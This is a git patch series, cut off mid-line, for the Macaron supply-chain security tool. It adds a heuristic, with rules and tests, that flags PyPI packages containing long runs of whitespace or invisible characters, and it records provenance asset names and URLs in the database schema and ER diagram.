From 28150280d3a46e4626863c8887be17e63d86f621 Mon Sep 17 00:00:00 2001 From: Amine Date: Mon, 19 May 2025 19:33:06 +0100 Subject: [PATCH 01/14] feat(heuristics): add Whitespace Check to detect excessive spacing and invisible characters Signed-off-by: Amine --- .gitignore | 1 + .../pypi_heuristics/heuristics.py | 3 + .../sourcecode/white_spaces.py | 98 +++++++++++++++++++ .../checks/detect_malicious_metadata_check.py | 7 ++ .../pypi/test_white_spaces.py | 70 +++++++++++++ 5 files changed, 179 insertions(+) create mode 100644 src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py create mode 100644 tests/malware_analyzer/pypi/test_white_spaces.py diff --git a/.gitignore b/.gitignore index 4bc971ba4..758a3d0cb 100644 --- a/.gitignore +++ b/.gitignore @@ -181,3 +181,4 @@ docs/_build bin/ requirements.txt .macaron_env_file +**/.DS_Store diff --git a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py index bd829a0f1..3b23e13f7 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py @@ -37,6 +37,9 @@ class Heuristics(str, Enum): #: Indicates that the package has an unusually large version number for a single release. ANOMALOUS_VERSION = "anomalous_version" + #: Indicates that the package has a lot of white spaces or invisible characters in the code. + WHITE_SPACES = "white_spaces" + class HeuristicResult(str, Enum): """Result type indicating the outcome of a heuristic.""" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py new file mode 100644 index 000000000..16521dba6 --- /dev/null +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py @@ -0,0 +1,98 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""This analyzer checks if the package has white spaces or invisible characters in the code.""" + +import logging +import re + +from macaron.config.defaults import defaults +from macaron.json_tools import JsonType +from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics +from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset + +logger: logging.Logger = logging.getLogger(__name__) + + +class WhiteSpacesAnalyzer(BaseHeuristicAnalyzer): + """Check whether the code has successive white spaces or invisible characters.""" + + INVISIBLE_CHARS = [ + "\u200b", + "\u200c", + "\u200d", + "\ufeff", + "\u200e", + "\u200f", + "\u00a0", + "\u00ad", + " ", + ] + + def __init__(self) -> None: + super().__init__( + name="white_spaces_analyzer", + heuristic=Heuristics.WHITE_SPACES, + depends_on=None, + ) + + self.repeated_spaces_threshold = self._load_defaults() + + def _load_defaults(self) -> int: + """Load default settings from defaults.ini. + + Returns + ------- + int: + The repeated spaces threshold. + """ + section_name = "heuristic.pypi" + if defaults.has_section(section_name): + section = defaults[section_name] + return section.getint("repeated_spaces_threshold", 50) + + return 50 + + def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the package. + + Parameters + ---------- + pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + + Returns + ------- + tuple[HeuristicResult, dict[str, JsonType]]: + The result and related information collected during the analysis. + """ + scripts: dict[str, str] | None = pypi_package_json.get_sourcecode() + if scripts is None: + return HeuristicResult.SKIP, {} + + for file, content in scripts.items(): + if file.endswith(".py") and self.has_white_spaces(content): + return HeuristicResult.FAIL, { + "file": file, + } + return HeuristicResult.PASS, {} + + def has_white_spaces(self, code_string: str) -> bool: + """Check for excessive or invisible whitespace characters in a code string. + + Parameters + ---------- + code_string: str + The code string to check. + + Returns + ------- + bool: + True if suspicious patterns are found, False otherwise. + """ + char_class = "".join(self.INVISIBLE_CHARS) + regex_pattern = f"[{char_class}]{{{self.repeated_spaces_threshold},}}" + if re.search(regex_pattern, code_string, re.DOTALL): + return True + return False diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index c69de3bde..8bff93353 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -27,6 +27,7 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer from macaron.malware_analyzer.pypi_heuristics.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer +from macaron.malware_analyzer.pypi_heuristics.sourcecode.white_spaces import WhiteSpacesAnalyzer from macaron.slsa_analyzer.analyze_context import AnalyzeContext from macaron.slsa_analyzer.checks.base_check import BaseCheck from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType @@ -332,6 +333,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: SuspiciousSetupAnalyzer, WheelAbsenceAnalyzer, AnomalousVersionAnalyzer, + WhiteSpacesAnalyzer, ] # name used to query the result of all problog rules, so it can be accessed outside the model. @@ -381,6 +383,10 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: failed({Heuristics.CLOSER_RELEASE_JOIN_DATE.value}), forceSetup. + % Package released with excessive whitespace in the code . + {Confidence.HIGH.value}::trigger(malware_high_confidence_4) :- + quickUndetailed, forceSetup, failed({Heuristics.WHITE_SPACES.value}). + % Package released recently with little detail, with multiple releases as a trust marker, but frequent and with % the same code. {Confidence.MEDIUM.value}::trigger(malware_medium_confidence_1) :- @@ -401,6 +407,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: {problog_result_access} :- trigger(malware_high_confidence_1). {problog_result_access} :- trigger(malware_high_confidence_2). {problog_result_access} :- trigger(malware_high_confidence_3). + {problog_result_access} :- trigger(malware_high_confidence_4). {problog_result_access} :- trigger(malware_medium_confidence_2). {problog_result_access} :- trigger(malware_medium_confidence_1). query({problog_result_access}). diff --git a/tests/malware_analyzer/pypi/test_white_spaces.py b/tests/malware_analyzer/pypi/test_white_spaces.py new file mode 100644 index 000000000..500ef00b5 --- /dev/null +++ b/tests/malware_analyzer/pypi/test_white_spaces.py @@ -0,0 +1,70 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Tests for the WhiteSpacesAnalyzer heuristic.""" +# pylint: disable=redefined-outer-name + + +from unittest.mock import MagicMock + +import pytest + +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.sourcecode.white_spaces import WhiteSpacesAnalyzer + + +@pytest.fixture() +def analyzer() -> WhiteSpacesAnalyzer: + """Pytest fixture to create a WhiteSpacesAnalyzer instance.""" + analyzer_instance = WhiteSpacesAnalyzer() + return analyzer_instance + + +def test_analyze_no_sourcecode(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer skips when there is no source code.""" + pypi_package_json.get_sourcecode.return_value = None + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.SKIP + assert info == {} + + +def test_analyze_pass(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer passes when no suspicious whitespace is found.""" + pypi_package_json.get_sourcecode.return_value = {"test.py": "print('hello')"} + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.PASS + assert info == {} + + +def test_analyze_fail_long_spaces(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer fails when long spaces are found.""" + repeated_spaces_threshold = analyzer.repeated_spaces_threshold + code = f"print('hello')\n{' ' * (repeated_spaces_threshold + 1)}print('world')" + pypi_package_json.get_sourcecode.return_value = {"test.py": code} + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.FAIL + assert info["file"] == "test.py" + + +def test_analyze_fail_invisible_chars(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: + """Test the analyzer fails when invisible characters are found.""" + repeated_spaces_threshold = analyzer.repeated_spaces_threshold + invisible_char = "\u200b" # Zero-width space. + code = f"print('hello'){invisible_char * repeated_spaces_threshold}print('world')" + pypi_package_json.get_sourcecode.return_value = {"test.py": code} + result, info = analyzer.analyze(pypi_package_json) + assert result == HeuristicResult.FAIL + assert info["file"] == "test.py" + + +def test_has_white_spaces_long_spaces(analyzer: WhiteSpacesAnalyzer) -> None: + """Test has_white_spaces method with long spaces.""" + repeated_spaces_threshold = analyzer.repeated_spaces_threshold + code = f"print('hello')\n{' ' * repeated_spaces_threshold}print('world')" + assert analyzer.has_white_spaces(code) + + +def test_has_white_spaces_no_suspicious(analyzer: WhiteSpacesAnalyzer) -> None: + """Test has_white_spaces method with no suspicious whitespace.""" + code = "print('hello')\nprint('world')" + assert not analyzer.has_white_spaces(code) From 6978bd765c84066ee7d17cb8b6ab84ed990b1930 Mon Sep 17 00:00:00 2001 From: Amine Date: Mon, 26 May 2025 10:51:13 +0100 Subject: [PATCH 02/14] chore: add config variable to defaults.ini and minor cleanup Signed-off-by: Amine --- .gitignore | 2 +- src/macaron/config/defaults.ini | 2 ++ .../pypi_heuristics/sourcecode/white_spaces.py | 9 +++++++-- .../checks/detect_malicious_metadata_check.py | 2 +- 4 files changed, 11 insertions(+), 4 deletions(-) diff --git a/.gitignore b/.gitignore index 758a3d0cb..ddf49dfd0 100644 --- a/.gitignore +++ b/.gitignore @@ -181,4 +181,4 @@ docs/_build bin/ requirements.txt .macaron_env_file -**/.DS_Store +.DS_Store diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index c46e09ce1..1111b3faf 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -600,3 +600,5 @@ major_threshold = 20 epoch_threshold = 3 # The number of days +/- the day of publish the calendar versioning day may be. day_publish_error = 4 +# THe threshold for the number of repeated spaces in a line from the source code. +repeated_spaces_threshold = diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py index 16521dba6..0807afd80 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py @@ -48,11 +48,16 @@ def _load_defaults(self) -> int: The repeated spaces threshold. """ section_name = "heuristic.pypi" + default_threshold = 50 + if defaults.has_section(section_name): section = defaults[section_name] - return section.getint("repeated_spaces_threshold", 50) + value_str = section.get("repeated_spaces_threshold", fallback=str(default_threshold)) + if value_str is not None and value_str.isdigit(): + return int(value_str) + return default_threshold - return 50 + return default_threshold def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the package. diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 8bff93353..7c83f637f 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -385,7 +385,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: % Package released with excessive whitespace in the code . {Confidence.HIGH.value}::trigger(malware_high_confidence_4) :- - quickUndetailed, forceSetup, failed({Heuristics.WHITE_SPACES.value}). + forceSetup, failed({Heuristics.WHITE_SPACES.value}). % Package released recently with little detail, with multiple releases as a trust marker, but frequent and with % the same code. From 76bc6dcbd9929071db31bd4feecb5ea1333dda6a Mon Sep 17 00:00:00 2001 From: Ben Selwyn-Smith Date: Thu, 29 May 2025 15:19:25 +1000 Subject: [PATCH 03/14] chore: store provenance asset info (#975) Signed-off-by: Ben Selwyn-Smith --- docs/source/assets/er-diagram.svg | 1592 +++++++++-------- src/macaron/database/table_definitions.py | 9 +- src/macaron/provenance/provenance_finder.py | 60 +- src/macaron/provenance/provenance_verifier.py | 26 +- .../repo_finder/repo_finder_deps_dev.py | 20 +- src/macaron/slsa_analyzer/analyzer.py | 15 +- .../checks/provenance_available_check.py | 23 +- .../cases/provenance_available/policy.dl | 17 + .../cases/provenance_available/test.yaml | 20 + .../repo_finder/test_repo_finder_deps_dev.py | 5 +- 10 files changed, 1011 insertions(+), 776 deletions(-) create mode 100644 tests/integration/cases/provenance_available/policy.dl create mode 100644 tests/integration/cases/provenance_available/test.yaml diff --git a/docs/source/assets/er-diagram.svg b/docs/source/assets/er-diagram.svg index e61539047..33520a9ba 100644 --- a/docs/source/assets/er-diagram.svg +++ b/docs/source/assets/er-diagram.svg @@ -1,958 +1,1118 @@ - - - - -%3 - + + + + _analysis - -_analysis - -id - [INTEGER] - NOT NULL - -analysis_time - [VARCHAR] - NOT NULL - -macaron_version - [VARCHAR] - NOT NULL + +_analysis + +id + + [INTEGER] + NOT NULL + +analysis_time + + [VARCHAR] + NOT NULL + +macaron_version + + [VARCHAR] + NOT NULL _component - -_component - -id - [INTEGER] - NOT NULL - -analysis_id - [INTEGER] - NOT NULL - -name - [VARCHAR(100)] - NOT NULL - -namespace - [VARCHAR(255)] - -purl - [VARCHAR] - NOT NULL - -qualifiers - [VARCHAR(1024)] - -subpath - [VARCHAR(200)] - -type - [VARCHAR(16)] - NOT NULL - -version - [VARCHAR(100)] + +_component + +id + + [INTEGER] + NOT NULL + +analysis_id + + [INTEGER] + NOT NULL + +name + + [VARCHAR(100)] + NOT NULL + +namespace + + [VARCHAR(255)] + +purl + + [VARCHAR] + NOT NULL + +qualifiers + + [VARCHAR(1024)] + +subpath + + [VARCHAR(200)] + +type + + [VARCHAR(16)] + NOT NULL + +version + + [VARCHAR(100)] _analysis--_component - -0..N -1 + +0..N +1 _check_facts - -_check_facts - -id - [INTEGER] - NOT NULL - -check_result_id - [INTEGER] - NOT NULL - -check_type - [VARCHAR] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -confidence - [FLOAT] - NOT NULL + +_check_facts + +id + + [INTEGER] + NOT NULL + +check_result_id + + [INTEGER] + NOT NULL + +check_type + + [VARCHAR] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +confidence + + [FLOAT] + NOT NULL _component--_check_facts - -0..N -1 + +0..N +1 _check_result - -_check_result - -id - [INTEGER] - NOT NULL - -check_id - [VARCHAR] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -passed - [BOOLEAN] - NOT NULL + +_check_result + +id + + [INTEGER] + NOT NULL + +check_id + + [VARCHAR] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +passed + + [BOOLEAN] + NOT NULL _component--_check_result - -0..N -1 + +0..N +1 _dependency - -_dependency - -child_component - [INTEGER] - NOT NULL - -parent_component - [INTEGER] - NOT NULL + +_dependency + +child_component + + [INTEGER] + NOT NULL + +parent_component + + [INTEGER] + NOT NULL _component--_dependency - -1 -1 + +1 +1 _component--_dependency - -1 -1 + +1 +1 _provenance - -_provenance - -id - [INTEGER] - NOT NULL - -commit_sha - [VARCHAR] - -component_id - [INTEGER] - NOT NULL - -provenance_payload - [VARCHAR] - NOT NULL - -release_commit_sha - [VARCHAR] - -release_tag - [VARCHAR] - -repository_url - [VARCHAR] - -slsa_level - [INTEGER] - NOT NULL - -slsa_version - [VARCHAR] - -verified - [BOOLEAN] - NOT NULL + +_provenance + +id + + [INTEGER] + NOT NULL + +commit_sha + + [VARCHAR] + +component_id + + [INTEGER] + NOT NULL + +provenance_asset_name + + [VARCHAR] + +provenance_asset_url + + [VARCHAR] + +provenance_payload + + [VARCHAR] + NOT NULL + +release_commit_sha + + [VARCHAR] + +release_tag + + [VARCHAR] + +repository_url + + [VARCHAR] + +slsa_level + + [INTEGER] + NOT NULL + +slsa_version + + [VARCHAR] + +verified + + [BOOLEAN] + NOT NULL _component--_provenance - -0..N -1 + +0..N +1 _provenance_subject - -_provenance_subject - -id - [INTEGER] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -sha256 - [VARCHAR] - NOT NULL + +_provenance_subject + +id + + [INTEGER] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +sha256 + + [VARCHAR] + NOT NULL _component--_provenance_subject - -0..N -1 + +0..N +1 _repo_finder_metadata - -_repo_finder_metadata - -id - [INTEGER] - NOT NULL - -commit_finder_outcome - [VARCHAR(21)] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -found_commit - [VARCHAR] - NOT NULL - -found_url - [VARCHAR] - NOT NULL - -repo_finder_outcome - [VARCHAR(24)] - NOT NULL + +_repo_finder_metadata + +id + + [INTEGER] + NOT NULL + +commit_finder_outcome + + [VARCHAR(21)] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +found_commit + + [VARCHAR] + NOT NULL + +found_url + + [VARCHAR] + NOT NULL + +repo_finder_outcome + + [VARCHAR(24)] + NOT NULL _component--_repo_finder_metadata - -0..N -1 + +0..N +1 _repository - -_repository - -id - [INTEGER] - NOT NULL - -branch_name - [VARCHAR] - -commit_date - [VARCHAR] - NOT NULL - -commit_sha - [VARCHAR] - NOT NULL - -complete_name - [VARCHAR] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -fs_path - [VARCHAR] - NOT NULL - -full_name - [VARCHAR] - NOT NULL - -name - [VARCHAR] - NOT NULL - -owner - [VARCHAR] - -release_tag - [VARCHAR] - -remote_path - [VARCHAR] - NOT NULL - -type - [VARCHAR] - NOT NULL + +_repository + +id + + [INTEGER] + NOT NULL + +branch_name + + [VARCHAR] + +commit_date + + [VARCHAR] + NOT NULL + +commit_sha + + [VARCHAR] + NOT NULL + +complete_name + + [VARCHAR] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +fs_path + + [VARCHAR] + NOT NULL + +full_name + + [VARCHAR] + NOT NULL + +name + + [VARCHAR] + NOT NULL + +owner + + [VARCHAR] + +release_tag + + [VARCHAR] + +remote_path + + [VARCHAR] + NOT NULL + +type + + [VARCHAR] + NOT NULL _component--_repository - -0..N -1 + +0..N +1 _slsa_level - -_slsa_level - -component_id - [INTEGER] - NOT NULL - -reached - [BOOLEAN] - NOT NULL - -slsa_level - [INTEGER] - NOT NULL + +_slsa_level + +component_id + + [INTEGER] + NOT NULL + +reached + + [BOOLEAN] + NOT NULL + +slsa_level + + [INTEGER] + NOT NULL _component--_slsa_level - -1 -1 + +1 +1 _slsa_requirement - -_slsa_requirement - -id - [INTEGER] - NOT NULL - -component_id - [INTEGER] - NOT NULL - -feedback - [VARCHAR] - -requirement_name - [VARCHAR(27)] - NOT NULL - -requirement_short_description - [VARCHAR] + +_slsa_requirement + +id + + [INTEGER] + NOT NULL + +component_id + + [INTEGER] + NOT NULL + +feedback + + [VARCHAR] + +requirement_name + + [VARCHAR(27)] + NOT NULL + +requirement_short_description + + [VARCHAR] _component--_slsa_requirement - -0..N -1 + +0..N +1 _artifact_pipeline_check - -_artifact_pipeline_check - -id - [INTEGER] - NOT NULL - -deploy_job - [VARCHAR] - -deploy_step - [VARCHAR] - -deploy_workflow - [VARCHAR] - -from_provenance - [BOOLEAN] - NOT NULL - -published_before_commit - [BOOLEAN] - NOT NULL - -run_deleted - [BOOLEAN] - NOT NULL - -run_url - [VARCHAR] + +_artifact_pipeline_check + +id + + [INTEGER] + NOT NULL + +deploy_job + + [VARCHAR] + +deploy_step + + [VARCHAR] + +deploy_workflow + + [VARCHAR] + +from_provenance + + [BOOLEAN] + NOT NULL + +published_before_commit + + [BOOLEAN] + NOT NULL + +run_deleted + + [BOOLEAN] + NOT NULL + +run_url + + [VARCHAR] _check_facts--_artifact_pipeline_check - -1 -1 + +1 +1 _build_as_code_check - -_build_as_code_check - -id - [INTEGER] - NOT NULL - -build_tool_name - [VARCHAR] - NOT NULL - -build_trigger - [VARCHAR] - -ci_service_name - [VARCHAR] - NOT NULL - -deploy_command - [VARCHAR] - -language - [VARCHAR] - NOT NULL - -language_distributions - [VARCHAR] - -language_url - [VARCHAR] - -language_versions - [VARCHAR] + +_build_as_code_check + +id + + [INTEGER] + NOT NULL + +build_tool_name + + [VARCHAR] + NOT NULL + +build_trigger + + [VARCHAR] + +ci_service_name + + [VARCHAR] + NOT NULL + +deploy_command + + [VARCHAR] + +language + + [VARCHAR] + NOT NULL + +language_distributions + + [VARCHAR] + +language_url + + [VARCHAR] + +language_versions + + [VARCHAR] _check_facts--_build_as_code_check - -1 -1 + +1 +1 _build_script_check - -_build_script_check - -id - [INTEGER] - NOT NULL - -build_tool_command - [VARCHAR] - -build_tool_name - [VARCHAR] - NOT NULL - -build_trigger - [VARCHAR] - -ci_service_name - [VARCHAR] - NOT NULL - -language - [VARCHAR] - NOT NULL - -language_distributions - [VARCHAR] - -language_url - [VARCHAR] - -language_versions - [VARCHAR] + +_build_script_check + +id + + [INTEGER] + NOT NULL + +build_tool_command + + [VARCHAR] + +build_tool_name + + [VARCHAR] + NOT NULL + +build_trigger + + [VARCHAR] + +ci_service_name + + [VARCHAR] + NOT NULL + +language + + [VARCHAR] + NOT NULL + +language_distributions + + [VARCHAR] + +language_url + + [VARCHAR] + +language_versions + + [VARCHAR] _check_facts--_build_script_check - -1 -1 + +1 +1 _build_service_check - -_build_service_check - -id - [INTEGER] - NOT NULL - -build_command - [VARCHAR] - -build_tool_name - [VARCHAR] - NOT NULL - -build_trigger - [VARCHAR] - -ci_service_name - [VARCHAR] - NOT NULL - -language - [VARCHAR] - NOT NULL - -language_distributions - [VARCHAR] - -language_url - [VARCHAR] - -language_versions - [VARCHAR] + +_build_service_check + +id + + [INTEGER] + NOT NULL + +build_command + + [VARCHAR] + +build_tool_name + + [VARCHAR] + NOT NULL + +build_trigger + + [VARCHAR] + +ci_service_name + + [VARCHAR] + NOT NULL + +language + + [VARCHAR] + NOT NULL + +language_distributions + + [VARCHAR] + +language_url + + [VARCHAR] + +language_versions + + [VARCHAR] _check_facts--_build_service_check - -1 -1 + +1 +1 _build_tool_check - -_build_tool_check - -id - [INTEGER] - NOT NULL - -build_tool_name - [VARCHAR] - NOT NULL - -language - [VARCHAR] - NOT NULL + +_build_tool_check + +id + + [INTEGER] + NOT NULL + +build_tool_name + + [VARCHAR] + NOT NULL + +language + + [VARCHAR] + NOT NULL _check_facts--_build_tool_check - -1 -1 + +1 +1 _cue_expectation - -_cue_expectation - -id - [INTEGER] - NOT NULL - -asset_url - [VARCHAR] - -description - [VARCHAR] - NOT NULL - -expectation_type - [VARCHAR] - NOT NULL - -path - [VARCHAR] - NOT NULL - -sha - [VARCHAR] - -target - [VARCHAR] - NOT NULL - -text - [VARCHAR] + +_cue_expectation + +id + + [INTEGER] + NOT NULL + +asset_url + + [VARCHAR] + +description + + [VARCHAR] + NOT NULL + +expectation_type + + [VARCHAR] + NOT NULL + +path + + [VARCHAR] + NOT NULL + +sha + + [VARCHAR] + +target + + [VARCHAR] + NOT NULL + +text + + [VARCHAR] _check_facts--_cue_expectation - -1 -1 + +1 +1 _detect_malicious_metadata_check - -_detect_malicious_metadata_check - -id - [INTEGER] - NOT NULL - -detail_information - [JSON] - NOT NULL - -known_malware - [VARCHAR] - -result - [JSON] - NOT NULL + +_detect_malicious_metadata_check + +id + + [INTEGER] + NOT NULL + +detail_information + + [JSON] + NOT NULL + +known_malware + + [VARCHAR] + +result + + [JSON] + NOT NULL _check_facts--_detect_malicious_metadata_check - -1 -1 + +1 +1 _github_actions_vulnerabilities_check - -_github_actions_vulnerabilities_check - -id - [INTEGER] - NOT NULL - -caller_workflow - [VARCHAR] - NOT NULL - -github_actions_id - [VARCHAR] - NOT NULL - -github_actions_version - [VARCHAR] - NOT NULL - -vulnerability_urls - [JSON] - NOT NULL + +_github_actions_vulnerabilities_check + +id + + [INTEGER] + NOT NULL + +caller_workflow + + [VARCHAR] + NOT NULL + +github_actions_id + + [VARCHAR] + NOT NULL + +github_actions_version + + [VARCHAR] + NOT NULL + +vulnerability_urls + + [JSON] + NOT NULL _check_facts--_github_actions_vulnerabilities_check - -1 -1 + +1 +1 _provenance_available_check - -_provenance_available_check - -id - [INTEGER] - NOT NULL - -asset_name - [VARCHAR] - -asset_url - [VARCHAR] + +_provenance_available_check + +id + + [INTEGER] + NOT NULL + +asset_name + + [VARCHAR] + +asset_url + + [VARCHAR] _check_facts--_provenance_available_check - -1 -1 + +1 +1 _provenance_derived_commit_check - -_provenance_derived_commit_check - -id - [INTEGER] - NOT NULL - -commit_info - [VARCHAR] + +_provenance_derived_commit_check + +id + + [INTEGER] + NOT NULL + +commit_info + + [VARCHAR] _check_facts--_provenance_derived_commit_check - -1 -1 + +1 +1 _provenance_derived_repo_check - -_provenance_derived_repo_check - -id - [INTEGER] - NOT NULL - -repository_info - [VARCHAR] + +_provenance_derived_repo_check + +id + + [INTEGER] + NOT NULL + +repository_info + + [VARCHAR] _check_facts--_provenance_derived_repo_check - -1 -1 + +1 +1 _provenance_verified_check - -_provenance_verified_check - -id - [INTEGER] - NOT NULL - -build_level - [INTEGER] - NOT NULL - -build_type - [VARCHAR] + +_provenance_verified_check + +id + + [INTEGER] + NOT NULL + +build_level + + [INTEGER] + NOT NULL + +build_type + + [VARCHAR] _check_facts--_provenance_verified_check - -1 -1 + +1 +1 _provenance_witness_l1_check - -_provenance_witness_l1_check - -id - [INTEGER] - NOT NULL - -artifact_url - [VARCHAR] - -provenance_name - [VARCHAR] - NOT NULL - -provenance_url - [VARCHAR] + +_provenance_witness_l1_check + +id + + [INTEGER] + NOT NULL + +artifact_url + + [VARCHAR] + +provenance_name + + [VARCHAR] + NOT NULL + +provenance_url + + [VARCHAR] _check_facts--_provenance_witness_l1_check - -1 -1 + +1 +1 _scm_authenticity_check - -_scm_authenticity_check - -id - [INTEGER] - NOT NULL - -build_tool - [VARCHAR] - NOT NULL - -fork_count - [INTEGER] - -reason - [VARCHAR] - NOT NULL - -repo_link - [VARCHAR] - -stars_count - [INTEGER] - -status - [VARCHAR] - NOT NULL + +_scm_authenticity_check + +id + + [INTEGER] + NOT NULL + +build_tool + + [VARCHAR] + NOT NULL + +fork_count + + [INTEGER] + +reason + + [VARCHAR] + NOT NULL + +repo_link + + [VARCHAR] + +stars_count + + [INTEGER] + +status + + [VARCHAR] + NOT NULL _check_facts--_scm_authenticity_check - -1 -1 + +1 +1 _trusted_builder_check - -_trusted_builder_check - -id - [INTEGER] - NOT NULL - -build_tool_name - [VARCHAR] - NOT NULL - -build_trigger - [VARCHAR] - -ci_service_name - [VARCHAR] - NOT NULL + +_trusted_builder_check + +id + + [INTEGER] + NOT NULL + +build_tool_name + + [VARCHAR] + NOT NULL + +build_trigger + + [VARCHAR] + +ci_service_name + + [VARCHAR] + NOT NULL _check_facts--_trusted_builder_check - -1 -1 + +1 +1 _vcs_check - -_vcs_check - -id - [INTEGER] - NOT NULL - -git_repo - [VARCHAR] + +_vcs_check + +id + + [INTEGER] + NOT NULL + +git_repo + + [VARCHAR] _check_facts--_vcs_check - -1 -1 + +1 +1 _check_result--_check_facts - -0..N -1 + +0..N +1 _release_artifact - -_release_artifact - -id - [INTEGER] - NOT NULL - -name - [VARCHAR] - NOT NULL - -provenance_id - [INTEGER] - -slsa_verified - [BOOLEAN] + +_release_artifact + +id + + [INTEGER] + NOT NULL + +name + + [VARCHAR] + NOT NULL + +provenance_id + + [INTEGER] + +slsa_verified + + [BOOLEAN] _provenance--_release_artifact - -0..N -{0,1} + +0..N +{0,1} _hash_digest - -_hash_digest - -id - [INTEGER] - NOT NULL - -artifact_id - [INTEGER] - NOT NULL - -digest - [VARCHAR] - NOT NULL - -digest_algorithm - [VARCHAR] - NOT NULL + +_hash_digest + +id + + [INTEGER] + NOT NULL + +artifact_id + + [INTEGER] + NOT NULL + +digest + + [VARCHAR] + NOT NULL + +digest_algorithm + + [VARCHAR] + NOT NULL _release_artifact--_hash_digest - -0..N -1 + +0..N +1 diff --git a/src/macaron/database/table_definitions.py b/src/macaron/database/table_definitions.py index 2a7f1e95a..be8928ce4 100644 --- a/src/macaron/database/table_definitions.py +++ b/src/macaron/database/table_definitions.py @@ -499,9 +499,6 @@ class Provenance(ORMBase): #: The release tag commit sha. release_commit_sha: Mapped[str] = mapped_column(String, nullable=True) - #: The release tag. - release_tag: Mapped[str] = mapped_column(String, nullable=True) - #: The repository URL from the provenance. repository_url: Mapped[str] = mapped_column(String, nullable=True) @@ -511,6 +508,12 @@ class Provenance(ORMBase): #: The provenance payload. provenance_payload: Mapped[InTotoPayload] = mapped_column(ProvenancePayload, nullable=False) + #: The name of the provenance asset. + provenance_asset_name: Mapped[str] = mapped_column(String, nullable=True) + + #: The URL of the provenance asset. + provenance_asset_url: Mapped[str] = mapped_column(String, nullable=True) + #: The verified status of the provenance. verified: Mapped[bool] = mapped_column(Boolean, nullable=False, default=False) diff --git a/src/macaron/provenance/provenance_finder.py b/src/macaron/provenance/provenance_finder.py index 853a3a3cd..715204a16 100644 --- a/src/macaron/provenance/provenance_finder.py +++ b/src/macaron/provenance/provenance_finder.py @@ -6,6 +6,7 @@ import logging import os import tempfile +from dataclasses import dataclass from functools import partial from packageurl import PackageURL @@ -30,6 +31,15 @@ logger: logging.Logger = logging.getLogger(__name__) +@dataclass(frozen=True) +class ProvenanceAsset: + """This class exists to hold a provenance payload with the original asset's name and URL.""" + + payload: InTotoPayload + name: str + url: str + + class ProvenanceFinder: """This class is used to find and retrieve provenance files from supported registries.""" @@ -44,7 +54,7 @@ def __init__(self) -> None: elif isinstance(registry, JFrogMavenRegistry): self.jfrog_registry = registry - def 